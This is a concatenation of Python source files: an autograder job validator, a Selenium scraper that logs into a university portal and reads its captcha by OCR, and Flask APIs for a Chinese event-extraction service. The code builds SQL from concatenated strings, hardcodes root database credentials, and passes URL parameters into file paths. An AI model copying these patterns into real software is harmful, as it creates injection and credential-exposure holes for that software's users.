if (not isinstance(job, TangoJob)):
return -1
# Every job must have a name
if not job.name:
self.log.error("validateJob: Missing job.name")
job.appendTrace("validateJob: Missing job.name")
errors += 1
# Check the virtual machine field
if not job.vm:
self.log.error("validateJob: Missing job.vm")
job.appendTrace("validateJob: Missing job.vm")
errors += 1
else:
if not job.vm.image:
self.log.error("validateJob: Missing job.vm.image")
job.appendTrace("validateJob: Missing job.vm.image")
errors += 1
else:
vobj = vmms[Config.VMMS_NAME]
if not vobj.isValidImage(job.vm.image):
self.log.error("validateJob: Image not found: %s" % job.vm.image)
job.appendTrace("validateJob: Image not found: %s" % job.vm.image)
errors += 1
else:
(name, ext) = os.path.splitext(job.vm.image)
job.vm.name = name
if not job.vm.vmms:
self.log.error("validateJob: Missing job.vm.vmms")
job.appendTrace("validateJob: Missing job.vm.vmms")
errors += 1
else:
if job.vm.vmms not in vmms:
self.log.error("validateJob: Invalid vmms name: %s" % job.vm.vmms)
job.appendTrace("validateJob: Invalid vmms name: %s" % job.vm.vmms)
errors += 1
# Check the output file
if not job.outputFile:
self.log.error("validateJob: Missing job.outputFile")
job.appendTrace("validateJob: Missing job.outputFile")
errors += 1
else:
if not os.path.exists(os.path.dirname(job.outputFile)):
self.log.error("validateJob: Bad output path: %s" % job.outputFile)
job.appendTrace("validateJob: Bad output path: %s" % job.outputFile)
errors += 1
# Check for max output file size parameter
if not job.maxOutputFileSize:
self.log.debug("validateJob: Setting job.maxOutputFileSize "
"to default value: %d bytes", Config.MAX_OUTPUT_FILE_SIZE)
job.maxOutputFileSize = Config.MAX_OUTPUT_FILE_SIZE
# Check the list of input files
hasMakefile = False
for inputFile in job.input:
if not inputFile.localFile:
self.log.error("validateJob: Missing inputFile.localFile")
job.appendTrace("validateJob: Missing inputFile.localFile")
errors += 1
else:
if not os.path.exists(os.path.dirname(job.outputFile)):
self.log.error("validateJob: Bad output path: %s" % job.outputFile)
job.appendTrace("validateJob: Bad output path: %s" % job.outputFile)
errors += 1
if inputFile.destFile == 'Makefile':
hasMakefile = True
# Check if input files include a Makefile
if not hasMakefile:
self.log.error("validateJob: Missing Makefile in input files.")
job.appendTrace("validateJob: Missing Makefile in input files.")
errors+=1
# Check if job timeout has been set; If not set timeout to default
if not job.timeout or job.timeout <= 0:
self.log.debug("validateJob: Setting job.timeout to"
" default config value: %d secs", Config.RUNJOB_TIMEOUT)
job.timeout = Config.RUNJOB_TIMEOUT
# Any problems, return an error status
if errors > 0:
self.log.error("validateJob: Job rejected: %d errors" % errors)
job.appendTrace("validateJob: Job rejected: %d errors" % errors)
return -1
else:
return 0
``` |
{
"source": "154544017/homework_check_for_sep_course",
"score": 2
} |
#### File: 154544017/homework_check_for_sep_course/main.py
```python
import sys
from time import sleep
import ddddocr
import requests
from prettytable import PrettyTable
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
def get_driver(driver_path, headless=True):
if headless:
chrome_options = Options()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--headless')
chrome_options.add_experimental_option('w3c', False)
driver = webdriver.Chrome(executable_path=driver_path, options=chrome_options)
else:
driver = webdriver.Chrome(executable_path=driver_path)
# driver.implicitly_wait(10)
return driver
def get_check_code_image(driver, img_path):
check_code_url = 'http://sep.ucas.ac.cn/changePic'
headers = {
'Host': 'sep.ucas.ac.cn',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',
'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
'Referer': 'http://sep.ucas.ac.cn/',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
# set cookies
c = driver.get_cookies()
cookies = {}
# get name and value item of cookie, convert to the dict used in requests
for cookie in c:
cookies[cookie['name']] = cookie['value']
# download the check code image via get request
response = requests.get(url=check_code_url, headers=headers, cookies=cookies)
img_data = response.content
with open(img_path, 'wb')as fp:
fp.write(img_data)
def ocr(img_path):
# recognize the image
ocr = ddddocr.DdddOcr()
with open(img_path, 'rb') as f:
img_bytes = f.read()
ocr_res = ocr.classification(img_bytes)
return ocr_res
# find checkcode element, if find then fill in
def fill_in_check_code(driver):
img_path = './img/code.png'
code_element = driver.find_elements_by_name('certCode')
if len(code_element) > 0:
get_check_code_image(driver, img_path)
code = ocr(img_path)
# fill in the code
code_element[0].send_keys(code)
def get_all_homework_from_course_website(driver):
courses_links = driver.find_element_by_class_name('otherSitesCategorList').find_elements_by_tag_name('li')
res = []
for i in range(len(courses_links)):
driver.find_element_by_link_text('我的课程').click()
sleep(1)
courses_links = driver.find_element_by_class_name('otherSitesCategorList').find_elements_by_tag_name('li')
courses_link = courses_links[i]
course_item = courses_link.find_element_by_class_name('fav-title')
course_name = course_item.find_element_by_class_name('fullTitle').text
# 跳转到当前课程
course_item.find_element_by_tag_name('a').click()
sleep(1)
# 跳转到作业界面
driver.find_element_by_link_text('作业').click()
tables = driver.find_elements_by_tag_name('table')
if len(tables) == 0:
print("{}没有作业".format(course_name))
else:
homework_table = tables[0]
homeworks = homework_table.find_elements_by_tag_name('tr')[1:]
for homework in homeworks:
infos = homework.find_elements_by_tag_name('td')[1:]
infos = list(map(lambda x: x.text, infos))
infos.insert(0, course_name)
res.append(infos)
return res
def print_table(lines):
tb = PrettyTable(['课程名', '作业', '提交状态', '开始', '截止'], encoding=sys.stdout.encoding)
tb.add_rows(lines)
print(tb.get_string(sortby='截止', reversesort=False))
def course_list(username, password):
# load driver
chrome_driver_path = './driver/chromedriver.exe'
driver = get_driver(chrome_driver_path, headless=False)
# visit sep
url = "http://sep.ucas.ac.cn/"
driver.get(url)
sleep(1)
# fill in check code
fill_in_check_code(driver)
# fill in username and password
username_element = driver.find_element_by_id('userName')
username_element.send_keys(username)
password_element = driver.find_element_by_id('pwd')
password_element.send_keys(password)
# login to sep
driver.find_element_by_id('sb').click()
sleep(1)
hands = driver.window_handles # 获取所有的句柄
driver.switch_to.window(hands[-1]) # 转到新页面
# move to course website
driver.find_element_by_link_text('课程网站').click()
sleep(1)
# get all homework info
homeworks = get_all_homework_from_course_website(driver)
driver.close()
# print results
homework_need_done = list(filter(lambda x: '尚未提交' in x[2], homeworks))
homework_done = list(filter(lambda x: '已提交' in x[2], homeworks))
print('赶紧做作业:')
print_table(homework_need_done)
print('还好做完了:')
print_table(homework_done)
if __name__ == '__main__':
m_username = ''
m_password = ''
course_list(m_username, m_password)
``` |
{
"source": "154544017/PetrarchChineseServer",
"score": 2
} |
#### File: resource/controller/eventLibApi.py
```python
from resource.model import dicModel
import datetime
import io
import json
from ConfigParser import ConfigParser
import threading
import time
from sqlalchemy.orm import sessionmaker
from sqlalchemy import create_engine
from flask import jsonify, request, Blueprint, g
from resource.model.textLibModel import TextLibrary
from petrarch_chinese.main import petrarch_chinese_main
from resource import db
from resource.model.analysisProjectModel import AnalysisProject
from resource.model.analysisProjectResultModel import AnalycisEventResult
from resource.model.textLibDataModel import TextLibraryData
from resource.model.dicModel import Dictionary
from sqlalchemy import text
from resource.model.analysisProjectResultModelSubThread import AnalycisEventResultSubThread
eventLibApi = Blueprint(name='event_lib', import_name=__name__)
engine = create_engine("mysql+pymysql://root:root@localhost:3306/lab?charset=utf8")
Session = sessionmaker(bind=engine)
threadLock = threading.Lock()
current_project_id = None
def create_analysis_result_table(project_id):
project_id = str(project_id)
table_name = 'rs_analysis_event_result_%s' % project_id
drop_sql = 'DROP TABLE IF EXISTS {}'.format(table_name)
create_sql = 'create table IF NOT EXISTS {}(' \
'id int(20) not null primary key auto_increment,' \
'text_id varchar(255) not null,' \
'recall_rate decimal(10,2),' \
'accuracy_rate decimal(10,2),' \
'event_num int(11) not null,' \
'event_result text not null' \
')'.format(table_name)
db.session.execute(drop_sql)
db.session.execute(create_sql)
@eventLibApi.route('/test')
def test():
# init_petrarch('1', '1')
# create_analysis_result_table('100')
petrarch_chinese_main()
return 'well done'
class AnalysisThread(threading.Thread):
def __init__(self, project_id, lib_id, dict_id, algorithm):
threading.Thread.__init__(self)
self.project_id = project_id
self.lib_id = lib_id
self.dict_id = dict_id
self.algorithm = algorithm
def run(self):
# 获得锁,成功获得锁定后返回True
# 可选的timeout参数不填时将一直阻塞直到获得锁定
# 否则超时后将返回False
threadLock.acquire()
try:
self.analysis_event()
except Exception as e:
print e
session = Session()
project = session.query(AnalysisProject).get(self.project_id)
project.end_time = datetime.datetime.now()
project.status = 4 # 4是异常的意思
session.commit()
finally:
# 释放锁
threadLock.release()
# 调整petrarch输入内容:调整事件合并开关、输入文本和输入字典
def init_petrarch(self):
# 调整合并事件开关
petr_cn_config = ConfigParser()
petr_cn_config.read('petrarch_chinese/configFile.ini')
if self.algorithm == 0:
petr_cn_config.set('Options', 'merge_event', 'False')
elif self.algorithm == 1:
petr_cn_config.set('Options', 'merge_event', 'True')
try:
with open('petrarch_chinese/configFile.ini', 'w+') as f:
petr_cn_config.write(f)
except Exception as e:
print (e)
# 获取输入文本,并写到petrarch对应位置
lib_tablename = 'rs_textlibrary_data_%s' % self.lib_id
TextLibraryData.__table__.name = lib_tablename
session = Session()
textdata = session.query(TextLibraryData).filter(TextLibraryData.is_delete == 0)
# textdata = TextLibraryData.query.filter(TextLibraryData.is_delete == 0)
with io.open('petrarch_chinese/input/test.txt', 'w', encoding='utf-8') as t:
for data in textdata:
text_id = data.id
text_title = data.title if data.title != '' else 'NULL'
text_summary = data.summary if data.summary != '' else 'NULL'
text_keywords = data.keywords if data.keywords != '' else 'NULL'
text_publish_time = data.publish_time if data.publish_time != '' else 'NULL'
text_author = data.author if data.author != '' else 'NULL'
text_source = 'NULL'
text_page = 'NULL'
text_content = data.content
text_url = data.url if data.url != '' else 'NULL'
input_list = [text_id, text_title, text_summary, text_keywords, text_publish_time, text_author,
text_source,
text_page, text_content, text_url]
input_list = [str(text) for text in input_list]
input_text = '|'.join(input_list).decode('utf-8')
t.write(input_text + '\n')
session = Session()
dictionary = session.query(Dictionary).get(self.dict_id)
dict_name = dictionary.file_name
petr_config = ConfigParser()
petr_config.read('petrarch_chinese/petrarch2/data/config/PETR_config.ini')
petr_config.set('Dictionaries', 'verbfile_name', dict_name)
petr_config.set('Dictionaries', 'test', 'True')
with open('petrarch_chinese/petrarch2/data/config/PETR_config.ini', 'w+') as fc:
petr_config.write(fc)
# 在子线程中分析文本库的文本,并把提取到的事件载入分析结果库里
def analysis_event(self):
# 修改成开始分析状态
session = Session()
project = session.query(AnalysisProject).get(self.project_id)
project.status = 1 # 1是运行中的状态
session.commit()
self.init_petrarch()
art_events = petrarch_chinese_main()
# 打开对应的结果库
table_name = 'rs_analysis_event_result_%s' % self.project_id
# 保存事件
try:
for art in art_events:
events = art_events[art]
event_num = len(events)
text_id = art
event_result = json.dumps(events)
new_result = AnalycisEventResult(text_id=text_id, event_num=event_num, event_result=event_result)
insertSQL = "insert into "+table_name+"(text_id,event_num,event_result) values('" + str(text_id) +"','" + str(event_num)+"','"+ event_result+"')"
# AnalycisEventResultSubThread.__table__.name = table_name
# temp = AnalycisEventResultSubThread(text_id=text_id,event_num=event_num,event_result=event_result)
insertSQL = insertSQL.replace(r'"',r'\"')
insertSQL = insertSQL.replace(r'\u', r'\\u')
session = Session()
session.execute(insertSQL)
session.commit()
# 修改分析状态
session = Session()
project = session.query(AnalysisProject).get(self.project_id)
project.end_time = datetime.datetime.now()
project.status = 2 # 2是完成的意思
session.commit()
# 将用户事件分析结果保留到指定文件夹
print("ok")
except Exception as e:
session = Session()
project = session.query(AnalysisProject).get(self.project_id)
project.end_time = datetime.datetime.now()
project.status = 4 # 4是异常的意思
session.commit()
print ('error')
print (e)
def test_thread():
time.sleep(5)
print("haha")
# 开始一个文本库事件提取
@eventLibApi.route('', methods=['POST'])
def create_analysis_event():
paras = request.json
lib_id = paras['lib_id'] # 文本库id
algorithm = paras['algorithm'] # 分析算法
type = paras['type'] # 提取分析类型
name = paras['name'] # 事件提取名称
dict_id = paras['dic_id'] # 词典id
uid = g.uid # 用户id
# TODO 用户暂时写死,调试用
if type != 13:
return jsonify(code=20001, flag=False, message="算法类型错误")
analysis_project = AnalysisProject(name=name, textlibrary_id=lib_id, analysis_algorithm=algorithm,
analysis_type=type, dictionary_id=dict_id, create_user=uid,
create_time=datetime.datetime.now())
try:
db.session.add(analysis_project)
db.session.commit()
db.session.flush()
# 输出新插入数据的主键
id = analysis_project.id
# 创建对应的文本库数据表
create_analysis_result_table(id)
# 子线程调用petrarch
analysis_thread = AnalysisThread(id, lib_id, dict_id, algorithm)
analysis_thread.start()
return jsonify(code=20000, flag=True, message="创建事件分析结果成功,分析程序将在后台运行")
except Exception as e:
print (e)
return jsonify(code=20001, flag=False, message="创建事件分析结果失败")
# 得到指定位置的分析结果
@eventLibApi.route('/<page>/<size>', methods=['GET'])
def get_analysis_project(page, size):
try:
projects = AnalysisProject.query.filter(AnalysisProject.is_delete == 1).all()
start = (int(page) - 1) * int(size)
end = min(int(page) * int(size), len(projects))
result_project = []
for project in projects[start:end]:
result_project.append(project.as_dict())
return jsonify(code=20000, flag=True, message="查询成功", data={"total": len(projects), "rows": result_project})
except Exception as e:
print(e)
return jsonify(code=20001, flag=False, message="查询事件分析结果失败")
# 删除特定的分析工程
@eventLibApi.route('/<id>', methods=['DELETE'])
def delete_analysis_project(id):
project = AnalysisProject.query.get(id)
if project is None:
return jsonify(code=20001, flag=False, message="不存在指定的文本库分析信息")
db.session.delete(project)
table_name = 'rs_analysis_event_result_%s' % id
drop_sql = 'DROP TABLE IF EXISTS {}'.format(table_name)
db.session.execute(drop_sql)
db.session.commit()
return jsonify(code=20000, flag=True, message="删除成功")
# 获得分析状态
@eventLibApi.route('/<id>', methods=['GET'])
def get_analysis_status(id):
project = AnalysisProject.query.get(id)
if project is None:
return jsonify(code=20001, flag=False, message="不存在指定的文本库分析信息")
status = project.status
return jsonify(code=20000, flag=True, message="未完成", data={"status": status})
@eventLibApi.route('/detail/<id>', methods=['GET'])
def get_analysis_detail(id):
project = AnalysisProject.query.get(id)
if project is None:
return jsonify(code=20001, flag=False, message="不存在指定的文本库分析信息")
textlib_id = project.textlibrary_id
TextLibraryData.__table__.name = 'rs_textlibrary_data_%s' % textlib_id
result_tablename = 'rs_analysis_event_result_%s' % id
AnalycisEventResult.__table__.name = result_tablename
analysis_results = db.session.query(AnalycisEventResult).all()
results = []
for analysis_result in analysis_results:
text_id = analysis_result.text_id
text_data = TextLibraryData.query.get(text_id)
result = analysis_result.as_dict()
result['content'] = text_data.content.encode("utf-8")
result['title'] = text_data.title
result['text_id'] = text_id
unicode_dict_list = json.loads(result['event_result'], encoding='utf-8',strict=False)
for unicode_dict in unicode_dict_list:
for key in unicode_dict:
if key != "origin":
unicode_dict[key] = unicode_dict[key].encode("utf-8")
result['event_result'] = unicode_dict_list
results.append(result)
return jsonify(code=20000, flag=True, message="查询成功", data=results)
@eventLibApi.route('/init', methods=['GET'])
def get_libs_and_dicts():
try:
libs = TextLibrary.query.filter(TextLibrary.is_delete != 1).all()
libs_json = []
for lib in libs:
libs_json.append(lib.as_dict())
res = dicModel.Dictionary.query.all()
data_json = []
for data in res:
data_json.append(data.as_dict())
return jsonify(code=20000, flag=True, message="查询完成", data={"libs": libs_json, "dicts": data_json})
except:
return jsonify(code=20001, flag=False, message="查询失败")
@eventLibApi.route('/', methods=['GET'])
def get_events():
try:
events = AnalysisProject.query.filter(AnalysisProject.is_delete != 1).all()
events_json = []
for event in events:
events_json.append(event.as_dict())
return jsonify(code=20000, flag=True, message="查询完成", data={"total": len(events), "json": events_json})
except:
return jsonify(code=20001, flag=False, message="查询失败")
```
#### File: resource/controller/eventResultApi.py
```python
from flask import Flask, blueprints, jsonify, request, Blueprint, g, send_file, make_response, send_from_directory
from resource.model.analysisProjectResultModel import AnalycisEventResult
from resource.model.analysisProjectModel import AnalysisProject
from resource.model.textLibDataModel import TextLibraryData
import json
import xml.dom.minidom
import re
import codecs
eventResultApi = Blueprint(name='event_result', import_name=__name__)
@eventResultApi.route('xml/<articleid>', methods=['GET'])
def get(articleid):
response = make_response(
send_from_directory("C:\\Users\\wxn\\Desktop\\1", 'e_result_1' + '.xml', as_attachment=True))
return response
@eventResultApi.route('/ff/<articleid>/<num>', methods=['GET'])
def event2xml(articleid, num):
word = []
fileName = articleid + "-format.txt"
# fileName = "C:/Users/wxn/Desktop/1/1-format.txt"
def convertUTF8ToANSI(oldfile, newfile):
# 打开UTF8文本文件
f = codecs.open(oldfile, 'r', 'utf8')
utfstr = f.read()
f.close()
# 把UTF8字符串转码成ANSI字符串
outansestr = utfstr.encode('mbcs')
# 使用二进制格式保存转码后的文本
f = open(newfile, 'wb')
f.write(outansestr)
f.close()
oldfile = fileName
newfile = fileName
convertUTF8ToANSI(oldfile, newfile)
with open(fileName, "r") as file:
char = file.read(0)
for char in file:
word.append(char)
file.close()
full = str(word[0])
allContent = full.split()
index = allContent[0]
date_all = re.findall(r"(\d{4}-\d{1,2}-\d{1,2})", full)
time_all = re.findall(r"(\d{2}:\d{2}:\d{2})", full)
index = allContent[0]
date = date_all[0]
retime = time_all[0]
num = 0
for item in allContent:
num = num + 1
if item == retime:
break
full = ''
for j in range(num + 3, len(allContent) - 1):
full = full + allContent[j]
def loadDataSet(fileName, splitChar='\t'):
dataSet = []
with open(fileName) as fr:
for line in fr.readlines()[2:]:
curline = line.strip().split(splitChar) # 字符串方法strip():返回去除两侧(不包括)内部空格的字符串;字符串方法spilt:按照制定的字符将字符串分割成序列
fltline = list(map(str, curline)) # list函数将其他类型的序列转换成字符串;map函数将序列curline中的每个元素都转为浮点型
dataSet.append(fltline)
return dataSet
dataSet = loadDataSet(fileName)
count = 0
coreData = []
def detect(text):
blankLocation = 0
coreTemp = text
for qq in coreTemp:
if qq == ".":
blankLocation = coreTemp.index(qq)
break
elif qq == " ":
blankLocation = coreTemp.index(qq)
break
if blankLocation == 0:
blankLocation = len(coreTemp)
return text[0:blankLocation]
for data in dataSet:
if ("#e" in str(data)):
co = count
event = data[0]
ids = dataSet[co + 2][1]
content = dataSet[co + 3][1]
source = dataSet[co + 4][1]
target = dataSet[co + 5][1]
trigger = dataSet[co + 6][1]
anchor = dataSet[co + 7][1]
coreData.append(event)
coreData.append(ids)
coreData.append(detect(content))
coreData.append(detect(source))
coreData.append(target)
coreData.append(detect(trigger))
coreData.append(detect(anchor))
count = count + 1
# 在内存中创建一个空的文档
doc = xml.dom.minidom.Document()
# 创建一个根节点Managers对象
root = doc.createElement('Body') # root表示body
# 设置根节点的属性
# 将根节点添加到文档对象中
doc.appendChild(root)
nodeAge = doc.createElement("content-ID")
nodeAge.appendChild(doc.createTextNode("Content ID-" + index))
root.appendChild(nodeAge)
nodeAge = doc.createElement("fullcontent")
nodeAge.appendChild(doc.createTextNode(full))
root.appendChild(nodeAge)
nodeAge = doc.createElement("reporttime")
nodeAge.appendChild(doc.createTextNode(date + " " + retime))
root.appendChild(nodeAge)
# 记录上一个段落的序号,如果当前这个和上一个的序号不同,则创建新的paragraph
# 记录上一个句子的序号,如果当前这个和上一个的序号不同,则创建新的sentence
childParagraphBefore = ""
childSentenceBefore = ""
childParagraphNow = ""
childSentenceNow = ""
for i in range(len(coreData)):
if ("#e" in str(coreData[i])):
ids = coreData[i + 1]
x = ids.split('_')
paraNum = x[0]
sentenceNum = x[1]
# x = ids.split('-')
# y = x[1].split('_')
# aticleNum = x[0]
# paraNum = y[0]
# sentenceNum = y[1]
# sp = '_'
# nPos=ids.index(sp)
childParagraphNow = paraNum
childSentenceNow = sentenceNum
if (childParagraphBefore is not childParagraphNow):
nodeParagraph = doc.createElement('Paragraph') # 创建段落
nodeSentence = doc.createElement('Sentence') # 创建句子
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeParagraph.appendChild(nodeSentence) # 把句子连在段落上
nodeEvent = doc.createElement('Event')
nodeEvent.setAttribute('eid', coreData[i])
nodeSentence.appendChild(nodeEvent)
# 位置计算
content_target = coreData[i + 2]
content_length = len(content_target)
content_full = full
full_length = len(full)
location = 0
for j in range(full_length):
if (content_full[j] == content_target[0]):
point_j = j
flag = 0
point_i = 0
for k in range(content_length):
if (content_full[point_j] != content_target[point_i]):
break
elif (content_full[point_j] == content_target[point_i]):
point_j = point_j + 1
point_i = point_i + 1
flag = flag + 1
if (flag == content_length):
location = j
content_target = coreData[i + 2]
content_length = len(content_target)
location1 = 0
location2 = 0
location3 = 0
# source
source_target = coreData[i + 3]
source_target_length = len(source_target)
for j1 in range(content_length):
if (content_target[j1] == source_target[0]):
point_j1 = j1
flag1 = 0
point_i1 = 0
for k1 in range(source_target_length):
if (content_target[point_j1] != source_target[point_i1]):
break
elif (content_target[point_j1] == source_target[point_i1]):
point_j1 = point_j1 + 1
point_i1 = point_i1 + 1
flag1 = flag1 + 1
if (flag1 == source_target_length):
location1 = j1
# trigger
trigger_target = coreData[i + 5]
# print("191:"+coreData[i + 5])
trigger_target_length = len(trigger_target)
for j2 in range(content_length):
if (content_target[j2] == trigger_target[0]):
point_j2 = j2
flag2 = 0
point_i2 = 0
for k2 in range(trigger_target_length):
if (content_target[point_j2] != trigger_target[point_i2]):
break
elif (content_target[point_j2] == trigger_target[point_i2]):
point_j2 = point_j2 + 1
point_i2 = point_i2 + 1
flag2 = flag2 + 1
if (flag2 == trigger_target_length):
location2 = j2
# target
target_target = coreData[i + 4]
target_target_length = len(target_target)
for j3 in range(content_length):
if (content_target[j3] == target_target[0]):
point_j3 = j3
flag3 = 0
point_i3 = 0
for k3 in range(target_target_length):
if (content_target[point_j3] != target_target[point_i3]):
break
elif (content_target[point_j3] == target_target[point_i3]):
point_j3 = point_j3 + 1
point_i3 = point_i3 + 1
flag3 = flag3 + 1
if (flag3 == target_target_length):
location3 = j3
# 位置计算(end)
if (coreData[i + 3] in content):
left1 = 0
right1 = content.index(coreData[i + 3])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left1:right1])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
# 检验
nodeSource = doc.createElement('source')
nodeSource.setAttribute('begin', str(location + location1))
nodeSource.setAttribute('end', str(location + location1 + source_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeSource.appendChild(doc.createTextNode(coreData[i + 3]))
nodeEvent.appendChild(nodeSource)
if (coreData[i + 5] in content):
print(coreData[i + 3])
left2 = content.index(coreData[i + 3]) + len(coreData[i + 3])
right2 = content.index(coreData[i + 5])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left2:right2])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTrigger = doc.createElement('trigger')
nodeTrigger.setAttribute('triggerid', coreData[i + 6][0:3])
nodeTrigger.setAttribute('begin', str(location + location2))
nodeTrigger.setAttribute('end', str(location + location2 + trigger_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTrigger.appendChild(doc.createTextNode(coreData[i + 5]))
nodeEvent.appendChild(nodeTrigger)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 5]) + len(coreData[i + 5])
right3 = content.index(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:right3])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTarget = doc.createElement('target')
nodeTarget.setAttribute('begin', str(location + location3))
nodeTarget.setAttribute('end', str(location + location3 + target_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTarget.appendChild(doc.createTextNode(coreData[i + 4]))
nodeEvent.appendChild(nodeTarget)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 4]) + len(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
# 将各叶子节点添加到父节点Manager中,
# 最后将Manager添加到根节点Managers中
root.appendChild(nodeParagraph)
elif (childParagraphBefore is childParagraphNow):
if (childSentenceBefore is not childSentenceNow):
nodeSentence = doc.createElement('Sentence') # 创建句子
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeParagraph.appendChild(nodeSentence) # 把句子0连在段落上
nodeEvent = doc.createElement('Event')
nodeEvent.setAttribute('eid', coreData[i])
nodeSentence.appendChild(nodeEvent)
# 位置计算
content_target = coreData[i + 2]
content_length = len(content_target)
content_full = full
full_length = len(full)
location = 0
for j in range(full_length):
if (content_full[j] == content_target[0]):
point_j = j
flag = 0
point_i = 0
for k in range(content_length):
if (content_full[point_j] != content_target[point_i]):
break
elif (content_full[point_j] == content_target[point_i]):
point_j = point_j + 1
point_i = point_i + 1
flag = flag + 1
if (flag == content_length):
location = j
content_target = coreData[i + 2]
content_length = len(content_target)
location1 = 0
location2 = 0
location3 = 0
# source
source_target = coreData[i + 3]
source_target_length = len(source_target)
for j1 in range(content_length):
if (content_target[j1] == source_target[0]):
point_j1 = j1
flag1 = 0
point_i1 = 0
for k1 in range(source_target_length):
if (content_target[point_j1] != source_target[point_i1]):
break
elif (content_target[point_j1] == source_target[point_i1]):
point_j1 = point_j1 + 1
point_i1 = point_i1 + 1
flag1 = flag1 + 1
if (flag1 == source_target_length):
location1 = j1
# trigger
trigger_target = coreData[i + 5]
trigger_target_length = len(trigger_target)
for j2 in range(content_length):
if (content_target[j2] == trigger_target[0]):
point_j2 = j2
flag2 = 0
point_i2 = 0
for k2 in range(trigger_target_length):
if (content_target[point_j2] != trigger_target[point_i2]):
break
elif (content_target[point_j2] == trigger_target[point_i2]):
point_j2 = point_j2 + 1
point_i2 = point_i2 + 1
flag2 = flag2 + 1
if (flag2 == trigger_target_length):
location2 = j2
# target
target_target = coreData[i + 4]
target_target_length = len(target_target)
for j3 in range(content_length):
if (content_target[j3] == target_target[0]):
point_j3 = j3
flag3 = 0
point_i3 = 0
for k3 in range(target_target_length):
if (content_target[point_j3] != target_target[point_i3]):
break
elif (content_target[point_j3] == target_target[point_i3]):
point_j3 = point_j3 + 1
point_i3 = point_i3 + 1
flag3 = flag3 + 1
if (flag3 == target_target_length):
location3 = j3
if (coreData[i + 3] in content):
left1 = 0
right1 = content.index(coreData[i + 3])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left1:right1])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeSource = doc.createElement('source')
nodeSource.setAttribute('begin', str(location + location1))
nodeSource.setAttribute('end', str(location + location1 + source_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeSource.appendChild(doc.createTextNode(coreData[i + 3]))
nodeEvent.appendChild(nodeSource)
if (coreData[i + 5] in content):
left2 = content.index(coreData[i + 3]) + len(coreData[i + 3])
right2 = content.index(coreData[i + 5])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left2:right2])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTrigger = doc.createElement('trigger')
nodeTrigger.setAttribute('triggerid', coreData[i + 6][0:3])
nodeTrigger.setAttribute('begin', str(location + location2))
nodeTrigger.setAttribute('end', str(location + location2 + trigger_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTrigger.appendChild(doc.createTextNode(coreData[i + 5]))
nodeEvent.appendChild(nodeTrigger)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 5]) + len(coreData[i + 5])
right3 = content.index(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:right3])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTarget = doc.createElement('target')
nodeTarget.setAttribute('begin', str(location + location3))
nodeTarget.setAttribute('end', str(location + location3 + target_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTarget.appendChild(doc.createTextNode(coreData[i + 4]))
nodeEvent.appendChild(nodeTarget)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 4]) + len(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
elif (childSentenceBefore is childSentenceNow):
nodeEvent = doc.createElement('Event')
nodeEvent.setAttribute('eid', coreData[i])
nodeSentence.appendChild(nodeEvent)
# 位置计算
content_target = coreData[i + 2]
content_length = len(content_target)
content_full = full
full_length = len(full)
location = 0
for j in range(full_length):
if (content_full[j] == content_target[0]):
point_j = j
flag = 0
point_i = 0
for k in range(content_length):
if (content_full[point_j] != content_target[point_i]):
break
elif (content_full[point_j] == content_target[point_i]):
point_j = point_j + 1
point_i = point_i + 1
flag = flag + 1
if (flag == content_length):
location = j
content_target = coreData[i + 2]
content_length = len(content_target)
location1 = 0
location2 = 0
location3 = 0
# source
source_target = coreData[i + 3]
source_target_length = len(source_target)
for j1 in range(content_length):
if (content_target[j1] == source_target[0]):
point_j1 = j1
flag1 = 0
point_i1 = 0
for k1 in range(source_target_length):
if (content_target[point_j1] != source_target[point_i1]):
break
elif (content_target[point_j1] == source_target[point_i1]):
point_j1 = point_j1 + 1
point_i1 = point_i1 + 1
flag1 = flag1 + 1
if (flag1 == source_target_length):
location1 = j1
trigger_target = coreData[i + 5]
trigger_target_length = len(trigger_target)
for j2 in range(content_length):
if (content_target[j2] == trigger_target[0]):
point_j2 = j2
flag2 = 0
point_i2 = 0
for k2 in range(trigger_target_length):
if (content_target[point_j2] != trigger_target[point_i2]):
